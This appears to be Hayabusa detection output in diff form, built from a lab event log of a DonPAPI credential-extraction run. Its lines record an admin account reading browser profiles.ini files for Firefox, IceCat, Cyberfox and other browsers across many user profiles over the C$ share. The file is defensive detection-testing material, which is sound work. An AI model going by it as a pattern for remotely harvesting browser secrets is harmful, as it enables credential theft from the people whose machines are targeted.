+2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.932 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.968 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
